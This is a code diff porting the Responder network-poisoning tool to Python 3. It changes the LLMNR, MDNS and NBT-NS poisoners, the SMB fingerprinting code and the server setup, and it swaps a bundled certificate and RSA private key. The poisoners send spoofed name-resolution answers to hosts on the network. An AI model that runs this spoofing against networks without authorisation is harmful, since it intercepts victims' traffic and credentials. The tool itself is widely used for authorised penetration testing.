 
 		if settings.Config.SMTP_On_Off:
 			from servers.SMTP import ESMTP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 25,  ESMTP,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 587, ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 25,  ESMTP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 587, ESMTP,)))
 
 		if settings.Config.IMAP_On_Off:
 			from servers.IMAP import IMAP
-			threads.append(Thread(target=serve_thread_tcp, args=('', 143, IMAP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 143, IMAP,)))
 
 		if settings.Config.DNS_On_Off:
 			from servers.DNS import DNS, DNSTCP
 			threads.append(Thread(target=serve_thread_udp, args=('', 53, DNS,)))
-			threads.append(Thread(target=serve_thread_tcp, args=('', 53, DNSTCP,)))
+			threads.append(Thread(target=serve_thread_tcp, args=(settings.Config.Bind_To, 53, DNSTCP,)))
 
 		for thread in threads:
 			thread.setDaemon(True)
 			thread.start()
 
-		print color('[+]', 2, 1) + " Listening for events..."
+		print(color('\n[+]', 2, 1) + " Listening for events...\n")
 
 		while True:
 			time.sleep(1)

certs/responder.crt

@@ -1,18 +1,18 @@
 -----BEGIN CERTIFICATE-----
-MIIC0zCCAbugAwIBAgIJAOQijexo77F4MA0GCSqGSIb3DQEBBQUAMAAwHhcNMTUw
-NjI5MDU1MTUyWhcNMjUwNjI2MDU1MTUyWjAAMIIBIjANBgkqhkiG9w0BAQEFAAOC
-AQ8AMIIBCgKCAQEAunMwNRcEEAUJQSZDeDh/hGmpPEzMr1v9fVYie4uFD33thh1k
-sPET7uFRXpPmaTMjJFZjWL/L/kgozihgF+RdyR7lBe26z1Na2XEvrtHbQ9a/BAYP
-2nX6V7Bt8izIz/Ox3qKe/mu1R5JFN0/i+y4/dcVCpPu7Uu1gXdLfRIvRRv7QtnsC
-6Q/c6xINEbUx58TRkq1lz+Tbk2lGlmon2HqNvQ0y/6amOeY0/sSau5RPw9xtwCPg
-WcaRdjwf+RcORC7/KVXVzMNcqJWwT1D1THs5UExxTEj4TcrUbcW75+vI3mIjzMJF
-N3NhktbqPG8BXC7+qs+UVMvriDEqGrGwttPXXwIDAQABo1AwTjAdBgNVHQ4EFgQU
-YY2ttc/bjfXwGqPvNUSm6Swg4VYwHwYDVR0jBBgwFoAUYY2ttc/bjfXwGqPvNUSm
-6Swg4VYwDAYDVR0TBAUwAwEB/zANBgkqhkiG9w0BAQUFAAOCAQEAXFN+oxRwyqU0
-YWTlixZl0NP6bWJ2W+dzmlqBxugEKYJCPxM0GD+WQDEd0Au4pnhyzt77L0sBgTF8
-koFbkdFsTyX2AHGik5orYyvQqS4jVkCMudBXNLt5iHQsSXIeaOQRtv7LYZJzh335
-4431+r5MIlcxrRA2fhpOAT2ZyKW1TFkmeAMoH7/BTzGlre9AgCcnKBvvGdzJhCyw
-YlRGHrfR6HSkcoEeIV1u/fGU4RX7NO4ugD2wkOhUoGL1BS926WV02c5CugfeKUlW
-HM65lZEkTb+MQnLdpnpW8GRXhXbIrLMLd2pWW60wFhf6Ub/kGJ5bCUTnXYPRcA3v
-u0/CRCN/lg==
+MIIC4TCCAcmgAwIBAgIUO+GAjgRhHP9zb1avAb9yg8JyGOgwDQYJKoZIhvcNAQEL
+BQAwADAeFw0xOTA4MTYyMjA2MTFaFw0yOTA4MTMyMjA2MTFaMAAwggEiMA0GCSqG
+SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDVvbov/KiK+Xbv/bhGQBlgb9eVqIFDtTPd
+0ZlLNOhRuHRUbw3XC3q3gPerfSE9ANeFUKfHpSUUA5AU4hjMSBMX1iUVR+OKgzTK
+czE4kAJe1ZJpiB8TU6FBapQwOPv9M463BOQQ8lfmX+EWerT+XniMFAmxf8FS7e4/
+V7JZbon7uU18fc6H8KxVaNCEM382SpL39zU7qRNVG65Jf4MejJZEk30GMC4m22Fb
+to6f/WS1NBk4HMdLClyXZngPY0idCuCZX3KBQvYpS3e1gEBsUPV0fZBz/GnvoE4o
+qTia83QJAkjZ0r77/NAptihsXrqB2VDuR6aP5Bf/YFr/U4H9y01lAgMBAAGjUzBR
+MB0GA1UdDgQWBBTs2vL9sLFs/p78FXHfgz7Zk8ZEwTAfBgNVHSMEGDAWgBTs2vL9
+sLFs/p78FXHfgz7Zk8ZEwTAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUA
+A4IBAQBIYrRgmGhAQr+VmyqSQcxYWW0GWKvGQwz5t1A8AoBe8d3SDb1mb/Lq/POx
+jnF67dAifYbTzz6JWsxCFED2UP8OL3oij0dWTfvGO//6nwhVss2Or0WTdxkSQVE4
+p4CElQYjvoYYhxuDzO3HsxqHBtxMOT+8fO/07aInxVWEtvmflNo3mxE4P7w6D8g5
+v2jZNf8EjTDQOF90kjkGGhTU7j9hRewfxzBZZOvaHA+/XczJ3fARpdYrvtFvvjnH
+Da1WjQDQhSLufZYcFrzd4i6pyXQYzevjgHSeFSJt78Hr0BxMkKzLAhsFmS6fiULm
+iKqwycWcwlFFUDbwBuOyfbfwjtUf
 -----END CERTIFICATE-----

certs/responder.key

@@ -1,27 +1,27 @@
 -----BEGIN RSA PRIVATE KEY-----
-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
+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
 -----END RSA PRIVATE KEY-----

fingerprint.py

@@ -16,18 +16,24 @@
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import socket
 import struct
+import sys
 
-from utils import color
+from utils import color, StructPython2or3, NetworkSendBufferPython2or3, NetworkRecvBufferPython2or3
 from packets import SMBHeader, SMBNego, SMBNegoFingerData, SMBSessionFingerData
 
 def OsNameClientVersion(data):
 	try:
-		length = struct.unpack('<H',data[43:45])[0]
-		pack = tuple(data[47+length:].split('\x00\x00\x00'))[:2]
-		OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
-		return OsVersion, ClientVersion
+		if (sys.version_info > (3, 0)):
+			length = struct.unpack('<H',data[43:45])[0]
+			packet = NetworkRecvBufferPython2or3(data[47+length:])
+			OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in packet.split('\x00\x00\x00')[:2]])
+			return OsVersion, ClientVersion
+		else:
+			length = struct.unpack('<H',data[43:45])[0]
+			OsVersion, ClientVersion = tuple([e.replace('\x00','') for e in data[47+length:].split('\x00\x00\x00')[:2]])
+			return OsVersion, ClientVersion
 	except:
-	 	return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
+		return "Could not fingerprint Os version.", "Could not fingerprint LanManager Client version"
 
 def RunSmbFinger(host):
 	try:
@@ -35,28 +41,26 @@ def RunSmbFinger(host):
 		s.connect(host)
 		s.settimeout(0.7)
 
-		h = SMBHeader(cmd="\x72",flag1="\x18",flag2="\x53\xc8")
-		n = SMBNego(data = SMBNegoFingerData())
+		h = SMBHeader(cmd='\x72',flag1='\x18',flag2='\x53\xc8')
+		n = SMBNego(data = str(SMBNegoFingerData()))
 		n.calculate()
-		
 		Packet = str(h)+str(n)
-		Buffer = struct.pack(">i", len(''.join(Packet)))+Packet
-		s.send(Buffer)
+		Buffer1 = StructPython2or3('>i', str(Packet))+str(Packet)
+		s.send(NetworkSendBufferPython2or3(Buffer1))
 		data = s.recv(2048)
 		
-		if data[8:10] == "\x72\x00":
+		if data[8:10] == b'\x72\x00':
 			Header = SMBHeader(cmd="\x73",flag1="\x18",flag2="\x17\xc8",uid="\x00\x00")
 			Body = SMBSessionFingerData()
 			Body.calculate()
 
 			Packet = str(Header)+str(Body)
-			Buffer = struct.pack(">i", len(''.join(Packet)))+Packet  
-
-			s.send(Buffer) 
+			Buffer1 = StructPython2or3('>i', str(Packet))+str(Packet)
+			s.send(NetworkSendBufferPython2or3(Buffer1))
 			data = s.recv(2048)
 
-		if data[8:10] == "\x73\x16":
+		if data[8:10] == b'\x73\x16':
 			return OsNameClientVersion(data)
 	except:
-		print color("[!] ", 1, 1) +" Fingerprint failed"
+		print(color("[!] ", 1, 1) +" Fingerprint failed")
 		return None

odict.py

@@ -1,20 +1,9 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from UserDict import DictMixin
+import sys
+try:
+	from UserDict import DictMixin
+except ImportError:
+	from collections import UserDict
+	from collections import MutableMapping as DictMixin
 
 class OrderedDict(dict, DictMixin):
 
@@ -30,7 +19,7 @@ class OrderedDict(dict, DictMixin):
     def clear(self):
         self.__end = end = []
         end += [None, end, end]
-        self.__map = {}
+        self.__map = {} 
         dict.clear(self)
 
     def __setitem__(self, key, value):
@@ -77,20 +66,30 @@ class OrderedDict(dict, DictMixin):
         inst_dict = vars(self).copy()
         self.__map, self.__end = tmp
         if inst_dict:
-            return self.__class__, (items,), inst_dict
+            return (self.__class__, (items,), inst_dict)
         return self.__class__, (items,)
 
     def keys(self):
         return list(self)
 
-    setdefault = DictMixin.setdefault
-    update = DictMixin.update
-    pop = DictMixin.pop
-    values = DictMixin.values
-    items = DictMixin.items
-    iterkeys = DictMixin.iterkeys
-    itervalues = DictMixin.itervalues
-    iteritems = DictMixin.iteritems
+    if sys.version_info >= (3, 0):
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.keys
+        itervalues = DictMixin.values
+        iteritems = DictMixin.items
+    else:
+        setdefault = DictMixin.setdefault
+        update = DictMixin.update
+        pop = DictMixin.pop
+        values = DictMixin.values
+        items = DictMixin.items
+        iterkeys = DictMixin.iterkeys
+        itervalues = DictMixin.itervalues
+        iteritems = DictMixin.iteritems
 
     def __repr__(self):
         if not self:
@@ -115,3 +114,8 @@ class OrderedDict(dict, DictMixin):
 
     def __ne__(self, other):
         return not self == other
+
+
+if __name__ == '__main__':
+    d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
+    assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

poisoners/LLMNR.py

@@ -14,32 +14,42 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import struct
-import fingerprint
 
+import fingerprint
 from packets import LLMNR_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
 
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
+
+
 
 def Parse_LLMNR_Name(data):
-	NameLen = struct.unpack('>B',data[12])[0]
-	return data[13:13+NameLen]
-
+	import codecs
+	NameLen = data[12]
+	if (sys.version_info > (3, 0)):
+		return data[13:13+NameLen]
+	else:
+		NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
+		return data[13:13+int(NameLen2)]
 
 def IsICMPRedirectPlausible(IP):
 	dnsip = []
-	for line in file('/etc/resolv.conf', 'r'):
-		ip = line.split()
-		if len(ip) < 2:
-		   continue
-		elif ip[0] == 'nameserver':
-			dnsip.extend(ip[1:])
-	for x in dnsip:
-		if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
-			print color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5)
-			print color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5)
-			print color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5)
+	with open('/etc/resolv.conf', 'r') as file:
+		for line in file:
+			ip = line.split()
+			if len(ip) < 2:
+		   		continue
+			elif ip[0] == 'nameserver':
+				dnsip.extend(ip[1:])
+		for x in dnsip:
+			if x != "127.0.0.1" and IsOnTheSameSubnet(x,IP) is False:
+				print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
+				print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
+				print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
 
 if settings.Config.AnalyzeMode:
 	IsICMPRedirectPlausible(settings.Config.Bind_To)
@@ -47,28 +57,40 @@ if settings.Config.AnalyzeMode:
 
 class LLMNR(BaseRequestHandler):  # LLMNR Server class
 	def handle(self):
-		data, soc = self.request
-		Name = Parse_LLMNR_Name(data)
-
-		# Break out if we don't want to respond to this host
-		if RespondToThisHost(self.client_address[0], Name) is not True:
-			return None
-
-		if data[2:4] == "\x00\x00" and Parse_IPV6_Addr(data):
-			Finger = None
-			if settings.Config.Finger_On_Off:
-				Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
-
-			if settings.Config.AnalyzeMode:
-				LineHeader = "[Analyze mode: LLMNR]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
-			else:  # Poisoning Mode
-				Buffer = LLMNR_Ans(Tid=data[0:2], QuestionName=Name, AnswerName=Name)
-				Buffer.calculate()
-				soc.sendto(str(Buffer), self.client_address)
-				LineHeader = "[*] [LLMNR]"
-				print color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1)
-
-			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+		try:
+			data, soc = self.request
+			Name = Parse_LLMNR_Name(data).decode("latin-1")
+			# Break out if we don't want to respond to this host
+			if RespondToThisHost(self.client_address[0], Name) is not True:
+				return None
+			if data[2:4] == b'\x00\x00' and Parse_IPV6_Addr(data):
+				Finger = None
+				if settings.Config.Finger_On_Off:
+					Finger = fingerprint.RunSmbFinger((self.client_address[0], 445))
+	
+				if settings.Config.AnalyzeMode:
+					LineHeader = "[Analyze mode: LLMNR]"
+					print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+							})
+				else:  # Poisoning Mode
+					Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
+					Buffer1.calculate()
+					soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
+					LineHeader = "[*] [LLMNR]"
+					print(color("%s  Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0], Name), 2, 1))
+					SavePoisonersToDb({
+							'Poisoner': 'LLMNR', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+							})
+				if Finger is not None:
+					print(text("[FINGER] OS Version     : %s" % color(Finger[0], 3)))
+					print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))
+		except:
+			raise

poisoners/MDNS.py

@@ -15,28 +15,40 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import struct
-
-from SocketServer import BaseRequestHandler
+import sys
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 from packets import MDNS_Ans
 from utils import *
 
 def Parse_MDNS_Name(data):
 	try:
-		data = data[12:]
-		NameLen = struct.unpack('>B',data[0])[0]
-		Name = data[1:1+NameLen]
-		NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
-		Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
-		return Name+'.'+Name_
+		if (sys.version_info > (3, 0)):
+			data = data[12:]
+			NameLen = data[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = data[1+NameLen]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			FinalName = Name+b'.'+Name_
+			return FinalName.decode("latin-1")
+		else:
+			data = NetworkRecvBufferPython2or3(data[12:])
+			NameLen = struct.unpack('>B',data[0])[0]
+			Name = data[1:1+NameLen]
+			NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
+			Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
+			return Name+'.'+Name_
+
 	except IndexError:
 		return None
 
 
 def Poisoned_MDNS_Name(data):
-	data = data[12:]
+	data = NetworkRecvBufferPython2or3(data[12:])
 	return data[:len(data)-5]
 
-
 class MDNS(BaseRequestHandler):
 	def handle(self):
 		MADDR = "224.0.0.251"
@@ -51,13 +63,25 @@ class MDNS(BaseRequestHandler):
 
 		if settings.Config.AnalyzeMode:  # Analyze Mode
 			if Parse_IPV6_Addr(data):
-				print text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3)))
+				print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0], 3), color(Request_Name, 3))))
+				SavePoisonersToDb({
+							'Poisoner': 'MDNS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Request_Name,
+							'AnalyzeMode': '1',
+						})
 		else:  # Poisoning Mode
 			if Parse_IPV6_Addr(data):
 
 				Poisoned_Name = Poisoned_MDNS_Name(data)
-				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=socket.inet_aton(settings.Config.Bind_To))
+				Buffer = MDNS_Ans(AnswerName = Poisoned_Name, IP=RespondWithIPAton())
 				Buffer.calculate()
-				soc.sendto(str(Buffer), (MADDR, MPORT))
+				soc.sendto(NetworkSendBufferPython2or3(Buffer), (MADDR, MPORT))
 
-				print color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1)
+				print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0], Request_Name), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'MDNS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Request_Name,
+							'AnalyzeMode': '0',
+						})

poisoners/NBTNS.py

@@ -15,22 +15,27 @@
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
 import fingerprint
-
+import sys
 from packets import NBT_Ans
-from SocketServer import BaseRequestHandler
 from utils import *
 
+if (sys.version_info > (3, 0)):
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
+
 # Define what are we answering to.
 def Validate_NBT_NS(data):
+	print("NBT-Service is:", NetworkRecvBufferPython2or3(data[43:46]))
 	if settings.Config.AnalyzeMode:
 		return False
-	elif NBT_NS_Role(data[43:46]) == "File Server":
+	elif NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "File Server":
 		return True
 	elif settings.Config.NBTNSDomain:
-		if NBT_NS_Role(data[43:46]) == "Domain Controller":
+		if NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "Domain Controller":
 			return True
 	elif settings.Config.Wredirect:
-		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector":
+		if NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46])) == "Workstation/Redirector":
 			return True
 	return False
 
@@ -40,28 +45,38 @@ class NBTNS(BaseRequestHandler):
 	def handle(self):
 
 		data, socket = self.request
-		Name = Decode_Name(data[13:45])
-
+		Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
 		# Break out if we don't want to respond to this host
 		if RespondToThisHost(self.client_address[0], Name) is not True:
 			return None
 
-		if data[2:4] == "\x01\x10":
+		if data[2:4] == b'\x01\x10':
 			Finger = None
 			if settings.Config.Finger_On_Off:
 				Finger = fingerprint.RunSmbFinger((self.client_address[0],445))
 
 			if settings.Config.AnalyzeMode:  # Analyze Mode
 				LineHeader = "[Analyze mode: NBT-NS]"
-				print color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1)
+				print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0], Name), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '1',
+						})
 			else:  # Poisoning Mode
-				Buffer = NBT_Ans()
-				Buffer.calculate(data)
-				socket.sendto(str(Buffer), self.client_address)
+				Buffer1 = NBT_Ans()
+				Buffer1.calculate(data)
+				socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
 				LineHeader = "[*] [NBT-NS]"
-
-				print color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(data[43:46])), 2, 1)
+				print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0], Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
+				SavePoisonersToDb({
+							'Poisoner': 'NBT-NS', 
+							'SentToIp': self.client_address[0], 
+							'ForName': Name,
+							'AnalyzeMode': '0',
+						})
 
 			if Finger is not None:
-				print text("[FINGER] OS Version     : %s" % color(Finger[0], 3))
-				print text("[FINGER] Client Version : %s" % color(Finger[1], 3))
+				print(text("[FINGER] OS Version     : %s" % color(Finger[0], 3)))
+				print(text("[FINGER] Client Version : %s" % color(Finger[1], 3)))

servers/Browser.py

@@ -14,40 +14,43 @@
 #
 # You should have received a copy of the GNU General Public License
 # along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
-from SocketServer import BaseRequestHandler
 from utils import *
+from packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
+if settings.Config.PY2OR3 == "PY3":
+	from socketserver import BaseRequestHandler
+else:
+	from SocketServer import BaseRequestHandler
 import struct
 
 
 def WorkstationFingerPrint(data):
 	return {
-		"\x04\x00"    :"Windows 95",
-		"\x04\x10"    :"Windows 98",
-		"\x04\x90"    :"Windows ME",
-		"\x05\x00"    :"Windows 2000",
-		"\x05\x01"    :"Windows XP",
-		"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
-		"\x06\x00"    :"Windows Vista/Server 2008",
-		"\x06\x01"    :"Windows 7/Server 2008R2",
-		"\x06\x02"    :"Windows 8/Server 2012",
-		"\x06\x03"    :"Windows 8.1/Server 2012R2",
-		"\x10\x00"    :"Windows 10/Server 2016",
-	}.get(data, 'Unknown')
+ 		b"\x04\x00"    :"Windows 95",
+		b"\x04\x0A"    :"Windows 98",
+		b"\x04\x5A"    :"Windows ME",
+ 		b"\x05\x00"    :"Windows 2000",
+ 		b"\x05\x01"    :"Windows XP",
+ 		b"\x05\x02"    :"Windows XP(64-Bit)/Windows 2003",
+ 		b"\x06\x00"    :"Windows Vista/Server 2008",
+ 		b"\x06\x01"    :"Windows 7/Server 2008R2",
+ 		b"\x06\x02"    :"Windows 8/Server 2012",
+ 		b"\x06\x03"    :"Windows 8.1/Server 2012R2",
+		b"\x0A\x00"    :"Windows 10/Server 2016",
+ 	}.get(data, 'Unknown')
 
 
 def RequestType(data):
 	return {
-		"\x01": 'Host Announcement',
-		"\x02": 'Request Announcement',
-		"\x08": 'Browser Election',
-		"\x09": 'Get Backup List Request',
-		"\x0a": 'Get Backup List Response',
-		"\x0b": 'Become Backup Browser',
